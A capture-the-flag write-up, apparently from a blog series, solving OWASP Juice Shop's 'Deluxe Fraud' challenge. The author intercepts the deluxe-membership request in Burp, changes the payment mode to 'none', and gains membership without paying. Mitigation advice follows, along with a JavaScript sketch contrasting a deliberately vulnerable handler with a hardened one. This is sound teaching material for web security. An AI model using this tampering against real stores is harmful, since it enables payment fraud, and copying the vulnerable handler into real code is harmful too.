Hacking OWASP’s Juice Shop Pt. 24: Deluxe Fraud

Challenge: 

Name: Deluxe Fraud

Description: Obtain a Deluxe Membership without paying for it.

Difficulty: 3 star

Category: Improper Input Validation

Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

In the expanded description for this challenge, it is heavily suggested that the payment parameters are the key to this particular challenge. While that obviously is how the score board would like for me to solve this, I wanted to see if paying with my ill-gotten gains from the Payback Time challenge would qualify as a solution.

[Screenshot: the "My Payment Options" page, listing a saved card (3456, Alfred J. Goldman, 12/2094), a wallet balance of 1000383.90 under "Pay using wallet" with a "Pay 49.00¤" button, plus the "Add new card", "Add a coupon" and "Other payment options" sections.]

It did not, and by registering for a deluxe membership in that manner I burned that particular account for this challenge. Oh well. It was a long shot anyway.

[Screenshot: the Deluxe Membership page ("Enjoy amazing benefits as a deluxe customer of OWASP Juice Shop. Check out what is included with your membership.") showing the error "You are not eligible for deluxe membership!"]

Next I decided to complete the challenge as directed, so (after creating a new user and paying that user back enough money to cover a deluxe membership) I fired up Burp Suite and FoxyProxy, then tried to pay with my wallet to see what data was being sent to the server.

[Screenshot: Burp Proxy intercepting the request to http://localhost:3000]

    POST /rest/deluxe-membership HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer [JWT, cut off in the screenshot]
    Content-Type: application/json
    Content-Length: 24
    Origin: http://localhost:3000
    Connection: close
    Referer: http://localhost:3000/
    Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; co[cut off in the screenshot]

    {"paymentMode":"wallet"}

It can’t be that simple…

[Screenshot: the same intercepted request in Burp, with the body changed to {"paymentMode":"none"}]

[Screenshot: banner reading "You successfully solved a challenge: Deluxe Fraud (Obtain a Deluxe Membership without paying for it.)"]

I guess it can.

Prevention and Mitigation Strategies:

Validate relevant information on the server side. The server should not issue a deluxe token or change the user’s role without verifying that payment had been received. That it didn’t even verify that a mode of payment had been selected is a major flaw, and one I would hope is extraordinarily infrequent in the real world.
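
A sketch of the server-side check described above, as an added example rather than code from this post or from Juice Shop: the function names, the in-memory store and the logic of the vulnerable variant are assumptions made for illustration. Both handlers can be given the same {"paymentMode":"none"} body; only the hardened one refuses to change the role without a verified payment.

```javascript
// Added example; names and the in-memory store are hypothetical, not Juice Shop's code.
const DELUXE_PRICE = 49;

// Constructed sample data standing in for the user, wallet and card tables.
function makeStore() {
  return {
    users: new Map([[1, { role: 'customer' }]]),
    wallets: new Map([[1, 60]]),
    cards: new Map([[7, { userId: 1 }], [8, { userId: 2 }]]),
  };
}

// Assumed shape of the flaw: payment is only handled for a mode the code
// recognises, and every other value falls through to the role change.
function upgradeVulnerable(store, userId, body) {
  const user = store.users.get(userId);
  if (body.paymentMode === 'wallet') {
    store.wallets.set(userId, store.wallets.get(userId) - DELUXE_PRICE);
  }
  user.role = 'deluxe';
  return { status: 200 };
}

// Hardened: allow-list the mode, verify the payment server-side, fail closed.
function upgradeHardened(store, userId, body) {
  const user = store.users.get(userId);
  if (!user) return { status: 401, error: 'not authenticated' };
  if (user.role !== 'customer') return { status: 400, error: 'not eligible' };
  const mode = body && body.paymentMode;
  if (mode === 'wallet') {
    const balance = store.wallets.get(userId) || 0;
    if (balance < DELUXE_PRICE) return { status: 402, error: 'insufficient funds' };
    store.wallets.set(userId, balance - DELUXE_PRICE);
  } else if (mode === 'card') {
    const card = store.cards.get(body.paymentId);
    // The card must exist and belong to the caller; a real system charges it here.
    if (!card || card.userId !== userId) return { status: 402, error: 'invalid card' };
  } else {
    // Missing, "none", or any non-string value: no payment, no upgrade.
    return { status: 400, error: 'invalid payment mode' };
  }
  user.role = 'deluxe';
  return { status: 200 };
}
```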

Lessons Learned and Things Worth Mentioning: 

In other challenges it had become clear that all of the input validation was being done on the client side, with the server blindly accepting whatever I sent it. In this case it was a safe assumption that I could continue using that same trick, so I did.
